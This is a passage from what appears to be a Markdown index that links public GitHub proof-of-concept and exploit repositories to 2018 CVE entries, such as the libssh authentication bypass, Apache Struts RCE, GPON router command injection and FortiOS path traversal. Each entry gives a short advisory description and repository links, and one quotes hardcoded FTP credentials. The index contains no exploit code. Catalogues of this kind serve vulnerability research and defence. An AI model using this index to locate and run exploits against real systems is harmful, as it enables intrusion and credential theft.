- [likaifeng0/CVE-2018-9995_dvr_credentials-dev_tool](https://github.com/likaifeng0/CVE-2018-9995_dvr_credentials-dev_tool)
- [b510/CVE-2018-9995-POC](https://github.com/b510/CVE-2018-9995-POC)
- [wmasday/HTC](https://github.com/wmasday/HTC)
- [awesome-consumer-iot/HTC](https://github.com/awesome-consumer-iot/HTC)
- [Saeed22487/CVE-2018-9995](https://github.com/Saeed22487/CVE-2018-9995)
- [kienquoc102/CVE-2018-9995-2](https://github.com/kienquoc102/CVE-2018-9995-2)
- [dearpan/cve-2018-9995](https://github.com/dearpan/cve-2018-9995)
- [LeQuocKhanh2K/Tool_Exploit_Password_Camera_CVE-2018-9995](https://github.com/LeQuocKhanh2K/Tool_Exploit_Password_Camera_CVE-2018-9995)
- [hoaan1995/CVE-2018-9995](https://github.com/hoaan1995/CVE-2018-9995)
- [ST0PL/DVRFaultNET](https://github.com/ST0PL/DVRFaultNET)
- [K3ysTr0K3R/CVE-2018-9995-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2018-9995-EXPLOIT)
- [Pab450/CVE-2018-9995](https://github.com/Pab450/CVE-2018-9995)
- [arminarab1999/CVE-2018-9995](https://github.com/arminarab1999/CVE-2018-9995)
- [X3RX3SSec/DVR_Sploit](https://github.com/X3RX3SSec/DVR_Sploit)
- [batmoshka55/CVE-2018-9995_dvr_credentials](https://github.com/batmoshka55/CVE-2018-9995_dvr_credentials)
- [dego905/Cam](https://github.com/dego905/Cam)
- [A-Alabdoo/CVE-DVr](https://github.com/A-Alabdoo/CVE-DVr)

### CVE-2018-10097 (2018-04-13)

XSS exists in Domain Trader 2.5.3 via the recoverlogin.php email_address parameter.

- [ashangp923/CVE-2018-10097](https://github.com/ashangp923/CVE-2018-10097)

### CVE-2018-10118 (2018-04-15)

Monstra CMS 3.0.4 has Stored XSS via the Name field on the Create New Page screen under the admin/index.php?id=pages URI, related to plugins/box/pages/pages.admin.php.

- [GeunSam2/CVE-2018-10118](https://github.com/GeunSam2/CVE-2018-10118)

### CVE-2018-10299 (2018-04-23)

An integer overflow in the batchTransfer function of a smart contract implementation for Beauty Ecosystem Coin (BEC), the Ethereum ERC20 token used in the Beauty Chain economic system, allows attackers to accomplish an unauthorized increase of digital assets by providing two _receivers arguments in conjunction with a large _value argument, as exploited in the wild in April 2018, aka the "batchOverflow" issue.

- [phzietsman/batchOverflow](https://github.com/phzietsman/batchOverflow)

### CVE-2018-10388 (2019-12-23)

Format string vulnerability in the logMess function in TFTP Server SP 1.66 and earlier allows remote attackers to perform a denial of service or execute arbitrary code via format string sequences in a TFTP error packet.

- [0xddaa/CVE-2018-10388](https://github.com/0xddaa/CVE-2018-10388)

### CVE-2018-10467
- [alt3kx/CVE-2018-10467](https://github.com/alt3kx/CVE-2018-10467)

### CVE-2018-10517 (2018-04-27)

In CMS Made Simple (CMSMS) through 2.2.7, the "module import" operation in the admin dashboard contains a remote code execution vulnerability, exploitable by an admin user, because an XML Package can contain base64-encoded PHP code in a data element.

- [0x00-0x00/CVE-2018-10517](https://github.com/0x00-0x00/CVE-2018-10517)

### CVE-2018-10546 (2018-04-29)

An issue was discovered in PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before 7.1.17, and 7.2.x before 7.2.5. An infinite loop exists in ext/iconv/iconv.c because the iconv stream filter does not reject invalid multibyte sequences.

- [dsfau/CVE-2018-10546](https://github.com/dsfau/CVE-2018-10546)

### CVE-2018-10562 (2018-05-04)

An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.

- [ExiaHan/GPON](https://github.com/ExiaHan/GPON)
- [649/Pingpon-Exploit](https://github.com/649/Pingpon-Exploit)
- [Choudai/GPON-LOADER](https://github.com/Choudai/GPON-LOADER)
- [c0ld1/GPON_RCE](https://github.com/c0ld1/GPON_RCE)
- [ATpiu/CVE-2018-10562](https://github.com/ATpiu/CVE-2018-10562)

### CVE-2018-10583 (2018-05-01)

An information disclosure vulnerability occurs when LibreOffice 6.0.3 and Apache OpenOffice Writer 4.1.5 automatically process and initiate an SMB connection embedded in a malicious file, as demonstrated by xlink:href=file://192.168.0.2/test.jpg within an office:document-content element in a .odt XML document.

- [MrTaherAmine/CVE-2018-10583](https://github.com/MrTaherAmine/CVE-2018-10583)
- [octodi/CVE-2018-10583](https://github.com/octodi/CVE-2018-10583)

### CVE-2018-10715
- [alt3kx/CVE-2018-10715](https://github.com/alt3kx/CVE-2018-10715)

### CVE-2018-10732 (2018-05-28)

The REST API in Dataiku DSS before 4.2.3 allows remote attackers to obtain sensitive information (i.e., determine whether a username is valid) because of profile picture visibility.

- [alt3kx/CVE-2018-10732](https://github.com/alt3kx/CVE-2018-10732)

### CVE-2018-10821 (2018-06-14)

Cross-site scripting (XSS) vulnerability in backend/pages/modify.php in BlackCatCMS 1.3 allows remote authenticated users with the Admin role to inject arbitrary web script or HTML via the search panel.

- [BalvinderSingh23/Cross-Site-Scripting-Reflected-XSS-Vulnerability-in-blackcatcms_v1.3](https://github.com/BalvinderSingh23/Cross-Site-Scripting-Reflected-XSS-Vulnerability-in-blackcatcms_v1.3)

### CVE-2018-10920 (2018-08-02)

An improper input validation bug in the DNS resolver component of Knot Resolver before 2.4.1 allows a remote attacker to poison the cache.

- [shutingrz/CVE-2018-10920_PoC](https://github.com/shutingrz/CVE-2018-10920_PoC)

### CVE-2018-10933 (2018-10-17)

A vulnerability was found in libssh's server-side state machine before versions 0.7.6 and 0.8.4. A malicious client could create channels without first performing authentication, resulting in unauthorized access.

- [SoledaD208/CVE-2018-10933](https://github.com/SoledaD208/CVE-2018-10933)
- [blacknbunny/CVE-2018-10933](https://github.com/blacknbunny/CVE-2018-10933)
- [hook-s3c/CVE-2018-10933](https://github.com/hook-s3c/CVE-2018-10933)
- [kn6869610/CVE-2018-10933](https://github.com/kn6869610/CVE-2018-10933)
- [jobroche/libssh-scanner](https://github.com/jobroche/libssh-scanner)
- [likekabin/CVE-2018-10933_ssh](https://github.com/likekabin/CVE-2018-10933_ssh)
- [likekabin/CVE-2018-10933-libSSH-Authentication-Bypass](https://github.com/likekabin/CVE-2018-10933-libSSH-Authentication-Bypass)
- [marco-lancini/hunt-for-cve-2018-10933](https://github.com/marco-lancini/hunt-for-cve-2018-10933)
- [hackerhouse-opensource/cve-2018-10933](https://github.com/hackerhouse-opensource/cve-2018-10933)
- [cve-2018/cve-2018-10933](https://github.com/cve-2018/cve-2018-10933)
- [jas502n/CVE-2018-10933](https://github.com/jas502n/CVE-2018-10933)
- [ninp0/cve-2018-10933_poc](https://github.com/ninp0/cve-2018-10933_poc)
- [pghook/CVE-2018-10933_Scanner](https://github.com/pghook/CVE-2018-10933_Scanner)
- [Virgula0/POC-CVE-2018-10933](https://github.com/Virgula0/POC-CVE-2018-10933)
- [shifa123/pythonprojects-CVE-2018-10933](https://github.com/shifa123/pythonprojects-CVE-2018-10933)
- [xFreed0m/CVE-2018-10933](https://github.com/xFreed0m/CVE-2018-10933)
- [Bifrozt/CVE-2018-10933](https://github.com/Bifrozt/CVE-2018-10933)
- [r3dxpl0it/CVE-2018-10933](https://github.com/r3dxpl0it/CVE-2018-10933)
- [ivanacostarubio/libssh-scanner](https://github.com/ivanacostarubio/libssh-scanner)
- [throwawayaccount12312312/precompiled-CVE-2018-10933](https://github.com/throwawayaccount12312312/precompiled-CVE-2018-10933)
- [reanimat0r/bpnd-libssh](https://github.com/reanimat0r/bpnd-libssh)
- [ensimag-security/CVE-2018-10933](https://github.com/ensimag-security/CVE-2018-10933)
- [0xadaw/libSSH-bypass](https://github.com/0xadaw/libSSH-bypass)
- [sambiyal/CVE-2018-10933-POC](https://github.com/sambiyal/CVE-2018-10933-POC)
- [nikhil1232/LibSSH-Authentication-Bypass](https://github.com/nikhil1232/LibSSH-Authentication-Bypass)
- [Kurlee/LibSSH-exploit](https://github.com/Kurlee/LibSSH-exploit)
- [crispy-peppers/Libssh-server-CVE-2018-10933](https://github.com/crispy-peppers/Libssh-server-CVE-2018-10933)
- [youkergav/CVE-2018-10933](https://github.com/youkergav/CVE-2018-10933)
- [kristyna-mlcakova/CVE-2018-10933](https://github.com/kristyna-mlcakova/CVE-2018-10933)
- [lalishasanduwara/CVE-2018-10933](https://github.com/lalishasanduwara/CVE-2018-10933)
- [JoSecMx/CVE-2018-10933_Scanner](https://github.com/JoSecMx/CVE-2018-10933_Scanner)
- [cyberharsh/Libssh-server-CVE-2018-10933](https://github.com/cyberharsh/Libssh-server-CVE-2018-10933)
- [Rubikcuv5/CVE-2018-10933](https://github.com/Rubikcuv5/CVE-2018-10933)
- [SilasSpringer/CVE-2018-10933](https://github.com/SilasSpringer/CVE-2018-10933)
- [HSw109/CVE-2018-10933](https://github.com/HSw109/CVE-2018-10933)

### CVE-2018-10936 (2018-08-30)

A weakness was found in postgresql-jdbc before version 42.2.5. It was possible to provide an SSL Factory and not check the host name if a host name verifier was not provided to the driver. This could lead to a condition where a man-in-the-middle attacker could masquerade as a trusted server by providing a certificate for the wrong host, as long as it was signed by a trusted CA.

- [tafamace/CVE-2018-10936](https://github.com/tafamace/CVE-2018-10936)

### CVE-2018-10949 (2018-05-10)

mailboxd in Zimbra Collaboration Suite 8.8 before 8.8.8; 8.7 before 8.7.11.Patch3; and 8.6 allows account enumeration by leveraging a discrepancy between the "HTTP 404 - account is not active" and "HTTP 401 - must authenticate" errors.

- [0x00-0x00/CVE-2018-10949](https://github.com/0x00-0x00/CVE-2018-10949)

### CVE-2018-10993
- [nicolastsk/cve-2018-10993](https://github.com/nicolastsk/cve-2018-10993)

### CVE-2018-11235 (2018-05-30)

In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs "git clone --recurse-submodules" because submodule "names" are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with "../" in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.

- [Rogdham/CVE-2018-11235](https://github.com/Rogdham/CVE-2018-11235)
- [vmotos/CVE-2018-11235](https://github.com/vmotos/CVE-2018-11235)
- [Choihosu/cve-2018-11235](https://github.com/Choihosu/cve-2018-11235)
- [CHYbeta/CVE-2018-11235-DEMO](https://github.com/CHYbeta/CVE-2018-11235-DEMO)
- [Kiss-sh0t/CVE-2018-11235-poc](https://github.com/Kiss-sh0t/CVE-2018-11235-poc)
- [H0K5/clone_and_pwn](https://github.com/H0K5/clone_and_pwn)
- [knqyf263/CVE-2018-11235](https://github.com/knqyf263/CVE-2018-11235)
- [ygouzerh/CVE-2018-11235](https://github.com/ygouzerh/CVE-2018-11235)
- [qweraqq/CVE-2018-11235-Git-Submodule-CE](https://github.com/qweraqq/CVE-2018-11235-Git-Submodule-CE)
- [AnonymKing/CVE-2018-11235](https://github.com/AnonymKing/CVE-2018-11235)
- [0rx1/CVE-2018-11235](https://github.com/0rx1/CVE-2018-11235)
- [cchang27/CVE-2018-11235-test](https://github.com/cchang27/CVE-2018-11235-test)
- [nthuong95/CVE-2018-11235](https://github.com/nthuong95/CVE-2018-11235)
- [xElkomy/CVE-2018-11235](https://github.com/xElkomy/CVE-2018-11235)
- [jongmartinez/CVE-2018-11235-PoC](https://github.com/jongmartinez/CVE-2018-11235-PoC)
- [MohamedTarekq/test-CVE-2018-11235](https://github.com/MohamedTarekq/test-CVE-2018-11235)
- [j4k0m/CVE-2018-11235](https://github.com/j4k0m/CVE-2018-11235)
- [twseptian/cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration](https://github.com/twseptian/cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration)
- [EmaVirgRep/CVE-2018-11235](https://github.com/EmaVirgRep/CVE-2018-11235)
- [theerachaich/lab](https://github.com/theerachaich/lab)

### CVE-2018-11311 (2018-05-20)

A hardcoded FTP username of myscada and password of Vikuk63 in 'myscadagate.exe' in mySCADA myPRO 7 allows remote attackers to access the FTP server on port 2121, and upload files or list directories, by entering these credentials.

- [EmreOvunc/mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password](https://github.com/EmreOvunc/mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password)

### CVE-2018-11321 (2018-05-22)

An issue was discovered in com_fields in Joomla! Core before 3.8.8. Inadequate filtering allows users authorised to create custom fields to manipulate the filtering options and inject an unvalidated option.

- [ExploitCN/CVE-2018-11321](https://github.com/ExploitCN/CVE-2018-11321)

### CVE-2018-11450 (2018-07-09)

A reflected Cross-Site-Scripting (XSS) vulnerability has been identified in Siemens PLM Software TEAMCENTER (V9.1.2.5). If a user visits the login portal through the URL crafted by the attacker, the attacker can insert html/javascript and thus alter/rewrite the login portal page. Siemens PLM Software TEAMCENTER V9.1.3 and newer are not affected.

- [LucvanDonk/Siemens-Siemens-PLM-Software-TEAMCENTER-Reflected-Cross-Site-Scripting-XSS-vulnerability](https://github.com/LucvanDonk/Siemens-Siemens-PLM-Software-TEAMCENTER-Reflected-Cross-Site-Scripting-XSS-vulnerability)

### CVE-2018-11510 (2018-06-28)

The ASUSTOR ADM 3.1.0.RFQ3 NAS portal suffers from an unauthenticated remote code execution vulnerability in the portal/apis/aggrecate_js.cgi file by embedding OS commands in the 'script' parameter.

- [mefulton/CVE-2018-11510](https://github.com/mefulton/CVE-2018-11510)

### CVE-2018-11517 (2018-05-28)

mySCADA myPRO 7 allows remote attackers to discover all ProjectIDs in a project by sending all of the prj parameter values from 870000 to 875000 in t=0&rq=0 requests to TCP port 11010.

- [EmreOvunc/mySCADA-myPRO-7-projectID-Disclosure](https://github.com/EmreOvunc/mySCADA-myPRO-7-projectID-Disclosure)

### CVE-2018-11564 (2018-06-01)

Stored XSS in YOOtheme Pagekit 1.0.13 and earlier allows a user to upload malicious code via the picture upload feature. A user with elevated privileges could upload a photo to the system in SVG format. This file will be uploaded to the system and it will not be stripped or filtered. The user can create a link on the website pointing to "/storage/poc.svg", which resolves to http://localhost/pagekit/storage/poc.svg. When a user comes along and clicks that link, it will trigger an XSS attack.

- [GeunSam2/CVE-2018-11564](https://github.com/GeunSam2/CVE-2018-11564)

### CVE-2018-11631 (2018-05-31)

Rondaful M1 Wristband Smart Band 1 devices allow remote attackers to send an arbitrary number of call or SMS notifications via crafted Bluetooth Low Energy (BLE) traffic.

- [ColeShelly/bandexploit](https://github.com/ColeShelly/bandexploit)

### CVE-2018-11686 (2019-07-03)

The Publish Service in FlexPaper (later renamed FlowPaper) 2.3.6 allows remote code execution via setup.php and change_config.php.

- [mpgn/CVE-2018-11686](https://github.com/mpgn/CVE-2018-11686)

### CVE-2018-11759 (2018-10-31)

The Apache Web Server (httpd) specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 did not handle some edge cases correctly. If only a subset of the URLs supported by Tomcat were exposed via httpd, then it was possible for a specially constructed request to expose application functionality through the reverse proxy that was not intended for clients accessing the application via the reverse proxy. It was also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical.

- [immunIT/CVE-2018-11759](https://github.com/immunIT/CVE-2018-11759)
- [Jul10l1r4/Identificador-CVE-2018-11759](https://github.com/Jul10l1r4/Identificador-CVE-2018-11759)
- [julioliraup/Identificador-CVE-2018-11759](https://github.com/julioliraup/Identificador-CVE-2018-11759)

### CVE-2018-11761 (2018-09-19)

In Apache Tika 0.1 to 1.18, the XML parsers were not configured to limit entity expansion. They were therefore vulnerable to an entity expansion vulnerability which can lead to a denial of service attack.

- [brianwrf/CVE-2018-11761](https://github.com/brianwrf/CVE-2018-11761)

### CVE-2018-11770 (2018-08-13)

From version 1.3.0 onward, Apache Spark's standalone master exposes a REST API for job submission, in addition to the submission mechanism used by spark-submit. In standalone, the config property 'spark.authenticate.secret' establishes a shared secret for authenticating requests to submit jobs via spark-submit. However, the REST API does not use this or any other authentication mechanism, and this is not adequately documented. In this case, a user would be able to run a driver program without authenticating, but not launch executors, using the REST API. This REST API is also used by Mesos, when set up to run in cluster mode (i.e., when also running MesosClusterDispatcher), for job submission. Future versions of Spark will improve documentation on these points, and prohibit setting 'spark.authenticate.secret' when running the REST APIs, to make this clear. Future versions will also disable the REST API by default in the standalone master by changing the default value of 'spark.master.rest.enabled' to 'false'.

- [ivanitlearning/CVE-2018-11770](https://github.com/ivanitlearning/CVE-2018-11770)

### CVE-2018-11776 (2018-08-22)

Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (set either by the user or by a plugin like the Convention Plugin) and then: results are used with no namespace and, at the same time, their upper package has no namespace or a wildcard namespace; similarly, the same possibility exists when using a url tag which has no value and action set and, at the same time, its upper package has no namespace or a wildcard namespace.

- [xfox64x/CVE-2018-11776](https://github.com/xfox64x/CVE-2018-11776)
- [jiguangsdf/CVE-2018-11776](https://github.com/jiguangsdf/CVE-2018-11776)
- [hook-s3c/CVE-2018-11776-Python-PoC](https://github.com/hook-s3c/CVE-2018-11776-Python-PoC)
- [mazen160/struts-pwn_CVE-2018-11776](https://github.com/mazen160/struts-pwn_CVE-2018-11776)
- [bhdresh/CVE-2018-11776](https://github.com/bhdresh/CVE-2018-11776)
- [knqyf263/CVE-2018-11776](https://github.com/knqyf263/CVE-2018-11776)
- [Ekultek/Strutter](https://github.com/Ekultek/Strutter)
- [tuxotron/cve-2018-11776-docker](https://github.com/tuxotron/cve-2018-11776-docker)
- [brianwrf/S2-057-CVE-2018-11776](https://github.com/brianwrf/S2-057-CVE-2018-11776)
- [649/Apache-Struts-Shodan-Exploit](https://github.com/649/Apache-Struts-Shodan-Exploit)
- [jezzus/CVE-2018-11776-Python-PoC](https://github.com/jezzus/CVE-2018-11776-Python-PoC)
- [cved-sources/cve-2018-11776](https://github.com/cved-sources/cve-2018-11776)
- [OzNetNerd/apche-struts-vuln-demo-cve-2018-11776](https://github.com/OzNetNerd/apche-struts-vuln-demo-cve-2018-11776)
- [cucadili/CVE-2018-11776](https://github.com/cucadili/CVE-2018-11776)
- [ArunBhandarii/Apache-Struts-0Day-Exploit](https://github.com/ArunBhandarii/Apache-Struts-0Day-Exploit)
- [freshdemo/ApacheStruts-CVE-2018-11776](https://github.com/freshdemo/ApacheStruts-CVE-2018-11776)
- [sonpt-afk/CVE-2018-11776-FIS](https://github.com/sonpt-afk/CVE-2018-11776-FIS)

### CVE-2018-11784 (2018-10-04)

When the default servlet in Apache Tomcat versions 9.0.0.M1 to 9.0.11, 8.5.0 to 8.5.33 and 7.0.23 to 7.0.90 returned a redirect to a directory (e.g. redirecting to '/foo/' when the user requested '/foo'), a specially crafted URL could be used to cause the redirect to be generated to any URI of the attacker's choice.

- [Cappricio-Securities/CVE-2018-11784](https://github.com/Cappricio-Securities/CVE-2018-11784)

### CVE-2018-11788 (2019-01-07)

Apache Karaf provides a features deployer, which allows users to "hot deploy" a features XML by dropping the file directly in the deploy folder. The features XML is parsed by the XMLInputFactory class. The Apache Karaf XMLInputFactory class doesn't contain any mitigation code against XXE. This is a potential security risk, as a user can inject external XML entities in Apache Karaf versions prior to 4.1.7 or 4.2.2. It has been fixed in the Apache Karaf 4.1.7 and 4.2.2 releases.

- [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788)

### CVE-2018-11790 (2019-01-31)

The defect occurs when loading a document with Apache OpenOffice 4.1.5 and earlier whose line terminators are shorter than the ones the operating system uses. In this case OpenOffice runs into an arithmetic overflow in a string length calculation.

- [anmuxi-bai/CVE-2018-11790](https://github.com/anmuxi-bai/CVE-2018-11790)

### CVE-2018-12018 (2018-07-05)

The GetBlockHeadersMsg handler in the LES protocol implementation in Go Ethereum (aka geth) before 1.8.11 may lead to an access violation because of an integer signedness error for the array index, which allows attackers to launch a Denial of Service attack by sending a packet with a -1 query.Skip value. The vulnerable remote node would be crashed by such an attack immediately, aka the EPoD (Ethereum Packet of Death) issue.

- [k3v142/CVE-2018-12018](https://github.com/k3v142/CVE-2018-12018)

### CVE-2018-12031 (2018-06-07)

Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via server/node_upgrade_srv.js directory traversal with the firmware parameter in a downloadFirmware action.

- [EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion](https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion)

### CVE-2018-12038 (2018-11-20)

An issue was discovered on Samsung 840 EVO devices. Vendor-specific commands may allow access to the disk-encryption key.

- [gdraperi/remote-bitlocker-encryption-report](https://github.com/gdraperi/remote-bitlocker-encryption-report)

### CVE-2018-12086 (2018-09-14)

Buffer overflow in OPC UA applications allows remote attackers to trigger a stack overflow with carefully structured requests.

- [kevinherron/stack-overflow-poc](https://github.com/kevinherron/stack-overflow-poc)

### CVE-2018-12326 (2018-06-17)

Buffer overflow in redis-cli of Redis before 4.0.10 and 5.x before 5.0 RC3 allows an attacker to achieve code execution and escalate to higher privileges via a crafted command line. NOTE: It is unclear whether there are any common situations in which redis-cli is used with, for example, a -h (aka hostname) argument from an untrusted source.

- [spasm5/CVE-2018-12326](https://github.com/spasm5/CVE-2018-12326)

### CVE-2018-12386 (2018-10-18)

A vulnerability in register allocation in JavaScript can lead to type confusion, allowing for an arbitrary read and write. This leads to remote code execution inside the sandboxed content process when triggered. This vulnerability affects Firefox ESR < 60.2.2 and Firefox < 62.0.3.

- [Hydra3evil/cve-2018-12386](https://github.com/Hydra3evil/cve-2018-12386)
- [0xLyte/cve-2018-12386](https://github.com/0xLyte/cve-2018-12386)

### CVE-2018-12418 (2018-06-14)

Archive.java in Junrar before 1.0.1, as used in Apache Tika and other products, is affected by a denial of service vulnerability due to an infinite loop when handling corrupt RAR files.

- [tafamace/CVE-2018-12418](https://github.com/tafamace/CVE-2018-12418)

### CVE-2018-12421 (2018-06-14)

LTB (aka LDAP Tool Box) Self Service Password before 1.3 allows a change to a user password (without knowing the old password) via a crafted POST request, because the ldap_bind return value is mishandled and the PHP data type is not constrained to be a string.

- [reversebrain/CVE-2018-12421](https://github.com/reversebrain/CVE-2018-12421)

### CVE-2018-12463 (2018-07-12)

An XML external entity (XXE) vulnerability in Fortify Software Security Center (SSC), version 17.1, 17.2, 18.1 allows remote unauthenticated users to read arbitrary files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request.

- [alt3kx/CVE-2018-12463](https://github.com/alt3kx/CVE-2018-12463)

### CVE-2018-12533 (2018-06-18)

JBoss RichFaces 3.1.0 through 3.3.4 allows unauthenticated remote attackers to inject expression language (EL) expressions and execute arbitrary Java code via a /DATA/ substring in a path with an org.richfaces.renderkit.html.Paint2DResource$ImageData object, aka RF-14310.

- [llamaonsecurity/CVE-2018-12533](https://github.com/llamaonsecurity/CVE-2018-12533)
- [Pastea/CVE-2018-12533](https://github.com/Pastea/CVE-2018-12533)

### CVE-2018-12537 (2018-08-14)

In Eclipse Vert.x versions 3.0 to 3.5.1, the HttpServer response headers and HttpClient request headers do not filter carriage return and line feed characters from the header value. This allows unfiltered values to inject a new header into the client request or server response.

- [tafamace/CVE-2018-12537](https://github.com/tafamace/CVE-2018-12537)

### CVE-2018-12540 (2018-07-12)

In versions 3.0.0 to 3.5.2 of Eclipse Vert.x, the CSRFHandler does not assert that the XSRF cookie matches the returned XSRF header/form parameter. This allows replay attacks with previously issued tokens which have not yet expired.

- [bernard-wagner/vertx-web-xsrf](https://github.com/bernard-wagner/vertx-web-xsrf)
- [tafamace/CVE-2018-12540](https://github.com/tafamace/CVE-2018-12540)

### CVE-2018-12596 (2018-10-10)

Episerver Ektron CMS before 9.0 SP3 Site CU 31, 9.1 before SP3 Site CU 45, or 9.2 before SP2 Site CU 22 allows remote attackers to call aspx pages via the "activateuser.aspx" page, even if a page is located under the /WorkArea/ path, which is forbidden (normally available exclusively for local admins).

- [alt3kx/CVE-2018-12596](https://github.com/alt3kx/CVE-2018-12596)

### CVE-2018-12597
- [alt3kx/CVE-2018-12597](https://github.com/alt3kx/CVE-2018-12597)

### CVE-2018-12598
- [alt3kx/CVE-2018-12598](https://github.com/alt3kx/CVE-2018-12598)

### CVE-2018-12613 (2018-06-21)

An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).

- [0x00-0x00/CVE-2018-12613](https://github.com/0x00-0x00/CVE-2018-12613)
- [ivanitlearning/CVE-2018-12613](https://github.com/ivanitlearning/CVE-2018-12613)
- [eastmountyxz/CVE-2018-12613-phpMyAdmin](https://github.com/eastmountyxz/CVE-2018-12613-phpMyAdmin)

### CVE-2018-12636 (2018-06-22)

The iThemes Security (better-wp-security) plugin before 7.0.3 for WordPress allows SQL Injection (by attackers with Admin privileges) via the logs page.

- [nth347/CVE-2018-12636_exploit](https://github.com/nth347/CVE-2018-12636_exploit)

### CVE-2018-12798 (2018-07-20)

Adobe Acrobat and Reader 2018.011.20040 and earlier, 2017.011.30080 and earlier, and 2015.006.30418 and earlier versions have a Heap Overflow vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user.

- [sharmasandeepkr/cve-2018-12798](https://github.com/sharmasandeepkr/cve-2018-12798)

### CVE-2018-12895 (2018-06-26)

WordPress through 4.9.6 allows Author users to execute arbitrary code by leveraging directory traversal in the wp-admin/post.php thumb parameter, which is passed to the PHP unlink function and can delete the wp-config.php file. This is related to missing filename validation in the wp-includes/post.php wp_delete_attachment function. The attacker must have capabilities for files and posts that are normally available only to the Author, Editor, and Administrator roles. The attack methodology is to delete wp-config.php and then launch a new installation process to increase the attacker's privileges.

- [bloom-ux/cve-2018-12895-hotfix](https://github.com/bloom-ux/cve-2018-12895-hotfix)

### CVE-2018-13257 (2019-11-18)

The bb-auth-provider-cas authentication module within Blackboard Learn 2018-07-02 is susceptible to HTTP host header spoofing during Central Authentication Service (CAS) service ticket validation, enabling a phishing attack from the CAS server login page.

- [gluxon/CVE-2018-13257](https://github.com/gluxon/CVE-2018-13257)

### CVE-2018-13341 (2018-08-10)

In Crestron TSW-X60 all versions prior to 2.001.0037.001 and MC3 all versions prior to 1.502.0047.00, the passwords for special sudo accounts may be calculated using information accessible to those with regular user privileges. Attackers could decipher these passwords, which may allow them to execute hidden API calls and escape the CTP console sandbox environment with elevated privileges.

- [axcheron/crestron_getsudopwd](https://github.com/axcheron/crestron_getsudopwd)
- [RajChowdhury240/CVE-2018-13341](https://github.com/RajChowdhury240/CVE-2018-13341)

### CVE-2018-13379 (2019-06-04)

An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under the SSL VPN web portal allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests.

- [milo2012/CVE-2018-13379](https://github.com/milo2012/CVE-2018-13379)
- [jpiechowka/at-doom-fortigate](https://github.com/jpiechowka/at-doom-fortigate)
- [0xHunter/FortiOS-Credentials-Disclosure](https://github.com/0xHunter/FortiOS-Credentials-Disclosure)
- [Blazz3/cve2018-13379-nmap-script](https://github.com/Blazz3/cve2018-13379-nmap-script)
- [yukar1z0e/CVE-2018-13379](https://github.com/yukar1z0e/CVE-2018-13379)
- [pwn3z/CVE-2018-13379-FortinetVPN](https://github.com/pwn3z/CVE-2018-13379-FortinetVPN)
- [k4nfr3/CVE-2018-13379-Fortinet](https://github.com/k4nfr3/CVE-2018-13379-Fortinet)
- [Zeop-CyberSec/fortios_vpnssl_traversal_leak](https://github.com/Zeop-CyberSec/fortios_vpnssl_traversal_leak)
- [B1anda0/CVE-2018-13379](https://github.com/B1anda0/CVE-2018-13379)
- [nivdolgin/CVE-2018-13379](https://github.com/nivdolgin/CVE-2018-13379)

### CVE-2018-13382 (2019-06-04)

An Improper Authorization vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under the SSL VPN web portal allows an unauthenticated attacker to modify the password of an SSL VPN web portal user via specially crafted HTTP requests.

- [milo2012/CVE-2018-13382](https://github.com/milo2012/CVE-2018-13382)
- [tumikoto/Exploit-FortinetMagicBackdoor](https://github.com/tumikoto/Exploit-FortinetMagicBackdoor)

### CVE-2018-13410 (2018-07-06)

Info-ZIP Zip 3.0, when the -T and -TT command-line options are used, allows attackers to cause a denial of service (invalid free and application crash) or possibly have unspecified other impact because of an off-by-one error. NOTE: it is unclear whether there are realistic scenarios in which an untrusted party controls the -TT value, given that the entire purpose of -TT is execution of arbitrary commands.

- [shinecome/zip](https://github.com/shinecome/zip)

### CVE-2018-13784 (2018-07-09)

PrestaShop before 1.6.1.20 and 1.7.x before 1.7.3.4 mishandles cookie encryption in Cookie.php, Rinjdael.php, and Blowfish.php.

- [ambionics/prestashop-exploits](https://github.com/ambionics/prestashop-exploits)

### CVE-2018-13797 (2018-07-10)

